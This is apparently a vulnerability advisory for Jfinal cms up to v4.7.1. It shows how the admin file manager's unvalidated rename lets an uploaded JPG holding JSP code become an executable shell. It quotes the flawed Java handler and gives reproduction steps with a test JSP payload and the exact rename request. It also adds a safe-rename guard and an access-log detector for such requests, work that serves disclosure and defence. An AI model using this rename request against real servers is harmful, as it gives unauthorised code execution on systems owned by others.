## Jfinal cms arbitrary file rename in the admin backend (getshell)
### Introduction to Vulnerability
Jfinal cms is built on the simple and powerful JFinal web framework, uses beetl as its template engine, MySQL as its database, and Bootstrap, Flat UI and other frameworks on the front end. It supports multiple sites, OAuth2 authentication, account registration, password encryption, comments and replies, message notifications, site traffic statistics, article comment and page-view statistics, response management, permission management, and more. The template management function in the admin backend does not filter the new file name supplied by the user when renaming a file, which leads to getshell.
### Vulnerability Impact
- Jfinal cms <= v4.7.1
### Vulnerability Analysis
The vulnerability trigger point is in `com/jflyfox/modules/filemanager/FileManagerController.java`:
```java
public void index() {
    HttpServletRequest request = getRequest();
    try {
        request.setCharacterEncoding("UTF-8");
        getResponse().setCharacterEncoding("UTF-8");
    } catch (UnsupportedEncodingException e) {
        e.printStackTrace();
    }
    FileManager fm = new FileManager(getRequest());
    JSONObject responseData = null;
    String mode = "";
    String path = "";
    boolean needPath = false;
    boolean putTextarea = false;
    if (!auth()) {
        fm.error(fm.lang("AUTHORIZATION_REQUIRED"));
    } else {
        String contextPath = request.getContextPath();
        // set contextPath
        fm.setGetVar("contextPath", contextPath);
        mode = request.getParameter("mode");
        path = request.getParameter("path");
        if (path != null) {
            try {
                if (request.getMethod().equals("GET"))
                    path = new String(path.getBytes("ISO8859-1"), "UTF-8");
            } catch (UnsupportedEncodingException e) {
                e.printStackTrace();
            }
            needPath = fm.setGetVar("path", path);
        }
        if (request.getMethod().equals("GET")) {
            if (mode != null && mode != "") {
                if (mode.equals("getinfo")) {
                    if (needPath) {
                        responseData = fm.getInfo();
                    }
                } else if (mode.equals("getfolder")) {
                    if (needPath) {
                        responseData = fm.getFolder();
                    }
                } else if (mode.equals("rename")) {
                    // "old" and "new" are only re-decoded here; no name or extension check
                    String oldFile = request.getParameter("old");
                    String newFile = request.getParameter("new");
                    try {
                        oldFile = new String(oldFile.getBytes("ISO8859-1"), "UTF-8");
                        newFile = new String(newFile.getBytes("ISO8859-1"), "UTF-8");
```
The listing above is cut off inside the `rename` branch. When the incoming `mode` is `rename`, the controller decodes `old` and `new` and then calls `FileManager.rename()`:
```java
public JSONObject rename() {
    String oldFile = this.get.get("old");
    String newFile = this.get.get("new");
    oldFile = getFilePath(oldFile);
    if (oldFile.endsWith("/")) {
        this.get.put("old", oldFile.substring(0, oldFile.length() - 1));
    }
    boolean error = false;
    JSONObject array = null;
    String tmp[] = oldFile.split("/");
    String filename = tmp[tmp.length - 1];
    int pos = oldFile.lastIndexOf("/");
    String path = oldFile.substring(0, pos + 1);
    File fileFrom = null;
    File fileTo = null;
    try {
        fileFrom = new File(this.fileRoot + oldFile);
        // newFile is concatenated into the target path without any validation
        fileTo = new File(this.fileRoot + path + newFile);
        if (fileTo.exists()) {
            if (fileTo.isDirectory()) {
                this.error(sprintf(lang("DIRECTORY_ALREADY_EXISTS"), newFile));
                error = true;
            } else { // fileTo.isFile
                this.error(sprintf(lang("FILE_ALREADY_EXISTS"), newFile));
                error = true;
            }
        } else if (!fileFrom.renameTo(fileTo)) {
            this.error(sprintf(lang("ERROR_RENAMING_DIRECTORY"), filename + "#" + newFile));
            error = true;
        }
    } catch (Exception e) {
        if (fileFrom.isDirectory()) {
            this.error(sprintf(lang("ERROR_RENAMING_DIRECTORY"), filename + "#" + newFile));
        } else {
            this.error(sprintf(lang("ERROR_RENAMING_FILE"), filename + "#" + newFile));
        }
        error = true;
    }
    if (!error) {
        array = new JSONObject();
        try {
            array.put("Error", "");
            array.put("Code", 0);
            array.put("Old Path", this.get.get("old"));
            array.put("Old Name", filename);
            array.put("New Path", path + this.get.get("new"));
            array.put("New Name", this.get.get("new"));
        } catch (JSONException e) {
            this.error("JSONObject error");
        }
    }
    return array;
}
```
The new file name supplied by the user is neither restricted nor filtered, so an attacker with access to the admin file manager can rename an uploaded file straight to a `.jsp` file.
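As an added example (not code from the Jfinal cms project), the following is the kind of guard the `FileManager.rename()` handler above lacks: the new name must be a bare file name, its extension must be on an allow-list that contains nothing the servlet container will execute, and both ends of the rename must stay under the managed root. The class name, the `ALLOWED_EXTENSIONS` list and the root directory are assumptions chosen for illustration.

```java
import java.io.File;
import java.io.IOException;
import java.util.Locale;
import java.util.Set;

/**
 * Added example, not Jfinal cms project code: a rename guard for a
 * file-manager "rename" operation. The allow-list below is an assumption;
 * a real deployment would derive it from what the template manager needs.
 */
public class SafeRename {

    // Assumed allow-list. Anything the container executes (jsp, jspx, jspf, ...)
    // is deliberately absent, so a rename can never make an upload executable.
    private static final Set<String> ALLOWED_EXTENSIONS =
            Set.of("jpg", "jpeg", "png", "gif", "css", "js", "html", "txt");

    /** Accept only a bare file name carrying an allow-listed extension. */
    public static boolean isSafeNewName(String newFile) {
        if (newFile == null || newFile.isEmpty() || newFile.length() > 255) {
            return false;
        }
        // No directory component, no NUL byte: the name must stay in its own folder.
        if (newFile.contains("/") || newFile.contains("\\") || newFile.indexOf('\0') >= 0) {
            return false;
        }
        if (newFile.equals(".") || newFile.equals("..")) {
            return false;
        }
        int dot = newFile.lastIndexOf('.');
        if (dot <= 0 || dot == newFile.length() - 1) {
            return false; // no extension, dot-file, or trailing dot
        }
        String ext = newFile.substring(dot + 1).toLowerCase(Locale.ROOT);
        return ALLOWED_EXTENSIONS.contains(ext);
    }

    /**
     * Rename oldFile (relative to root) to newFile in the same directory,
     * refusing names outside the allow-list and paths that escape the root.
     */
    public static boolean rename(File root, String oldFile, String newFile) throws IOException {
        if (!isSafeNewName(newFile)) {
            return false;
        }
        File canonicalRoot = root.getCanonicalFile();
        File from = new File(canonicalRoot, oldFile).getCanonicalFile();
        File to = new File(from.getParentFile(), newFile).getCanonicalFile();
        // Canonicalised source and target must both lie under the managed root.
        String rootPrefix = canonicalRoot.getPath() + File.separator;
        if (!from.getPath().startsWith(rootPrefix) || !to.getPath().startsWith(rootPrefix)) {
            return false;
        }
        if (!from.isFile() || to.exists()) {
            return false;
        }
        return from.renameTo(to);
    }

    public static void main(String[] args) {
        // Constructed inputs: the rename used in this write-up next to benign ones.
        String[] names = {"shell.jsp", "shell.jpg", "../shell.jsp", "a.JSPX", ".htaccess", "banner.PNG"};
        for (String n : names) {
            System.out.printf("%-14s -> %s%n", n, isSafeNewName(n) ? "allowed" : "rejected");
        }
    }
}
```

The guard is deliberately an allow-list rather than a deny-list of `.jsp`: case variants and alternative JSP extensions (`.jspx`, `.jspf`) are then rejected without having to enumerate them, and the same check can be reused on upload so a file like `shell.jpg` with JSP content never gets a second chance to become executable. Directories are left out of `rename()` here for brevity; the original handler renames them too.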
### Vulnerability reproduction
1. Login to the background
2. Click on Template Management
3. Click Upload and upload a file named shell.jpg whose content is `<% out.print("123"); %>`
![](https://images.seebug.org/1553855522696-w331s)
4. Rename the file and change shell.jpg to shell.jsp
```
http://localhost:8080/jfinal_cms/admin/filemanager?mode=rename&old=%2Fjfinal_cms%2Fshell.jpg&new=shell.jsp&config=filemanager.config.js
```
![](https://images.seebug.org/1553855530679-w331s)
5. Access the shell
![](https://images.seebug.org/1553855537089-w331s)
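The rename request in step 4 is a plain GET with `mode=rename` and the new name in the query string, so it leaves a clear trace in web-server access logs. The following added example (not part of the original write-up) scans constructed common-log-format lines for file-manager rename requests whose decoded `new` parameter ends in a container-executable extension; the log format, the sample lines and the `/filemanager` path filter are assumptions.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/**
 * Added example, not from the write-up: flag file-manager rename requests in
 * access logs whose "new" name has an executable extension. Log format and
 * sample lines are constructed for illustration.
 */
public class RenameLogCheck {

    // Request line of a common-log-format entry: method, URL, protocol.
    private static final Pattern REQUEST =
            Pattern.compile("\"(?:GET|POST) (\\S+) HTTP/[0-9.]+\"");
    // Extensions a servlet container will typically execute (assumed list).
    private static final Pattern EXECUTABLE_EXT =
            Pattern.compile("\\.(jsp|jspx|jspf)$", Pattern.CASE_INSENSITIVE);

    /** Return one query parameter, percent-decoded, or null if absent. */
    static String queryParam(String url, String name) {
        int q = url.indexOf('?');
        if (q < 0) return null;
        for (String pair : url.substring(q + 1).split("&")) {
            int eq = pair.indexOf('=');
            String key = eq < 0 ? pair : pair.substring(0, eq);
            if (key.equals(name)) {
                String raw = eq < 0 ? "" : pair.substring(eq + 1);
                return URLDecoder.decode(raw, StandardCharsets.UTF_8);
            }
        }
        return null;
    }

    /** Lines where mode=rename and the decoded "new" name has an executable extension. */
    public static List<String> suspiciousRenames(List<String> logLines) {
        List<String> hits = new ArrayList<>();
        for (String line : logLines) {
            Matcher m = REQUEST.matcher(line);
            if (!m.find()) continue;
            String url = m.group(1);
            if (!url.contains("/filemanager")) continue;          // assumed handler path
            if (!"rename".equals(queryParam(url, "mode"))) continue;
            String newName = queryParam(url, "new");
            if (newName != null && EXECUTABLE_EXT.matcher(newName).find()) {
                hits.add(line);
            }
        }
        return hits;
    }

    public static void main(String[] args) {
        // Constructed sample log lines (not real traffic).
        List<String> sample = List.of(
            "10.0.0.5 - - [29/Mar/2019:10:00:01 +0800] \"GET /jfinal_cms/admin/filemanager?mode=getfolder&path=%2Fjfinal_cms%2F HTTP/1.1\" 200 512",
            "10.0.0.5 - - [29/Mar/2019:10:00:07 +0800] \"GET /jfinal_cms/admin/filemanager?mode=rename&old=%2Fjfinal_cms%2Fshell.jpg&new=shell.jsp&config=filemanager.config.js HTTP/1.1\" 200 210",
            "10.0.0.9 - - [29/Mar/2019:10:01:00 +0800] \"GET /jfinal_cms/admin/filemanager?mode=rename&old=%2Fjfinal_cms%2Fa.png&new=b.png HTTP/1.1\" 200 198"
        );
        for (String hit : suspiciousRenames(sample)) {
            System.out.println("ALERT: " + hit);
        }
    }
}
```

Only the second sample line is reported. Because the decode happens before the extension test, percent-encoded variants of the new name are caught as well; a matching line followed by a request for the renamed `.jsp` path is the sequence from steps 4 and 5 above and is worth correlating in the same log.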